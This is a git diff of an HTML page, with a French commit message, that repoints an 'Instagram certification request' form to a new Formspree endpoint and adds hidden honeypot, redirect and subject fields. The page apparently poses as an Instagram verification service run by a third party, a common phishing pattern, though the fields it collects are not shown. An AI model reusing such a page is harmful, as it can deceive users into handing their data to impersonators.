Mise à jour du formulaire avec nouvelle configuration Formspree

--- a/index.html
+++ b/index.html
@@ -43,7 +43,12 @@
         </section>
 
         <div class="form-wrapper">
-            <form class="certification-form" action="https://formspree.io/f/xjkvwqek" method="POST">
+            <form class="certification-form" action="https://formspree.io/f/xdkogryo" method="POST">
+                <!-- Champs de configuration Formspree -->
+                <input type="text" name="_gotcha" style="display:none">
+                <input type="hidden" name="_next" value="https://formspree.io/f/xdkogryo/merci.html">
+                <input type="hidden" name="_subject" value="Nouvelle demande de certification Instagram">
+
                 <div class="progress">
                     <div class="steps">
                         <div class="step active">1</div>
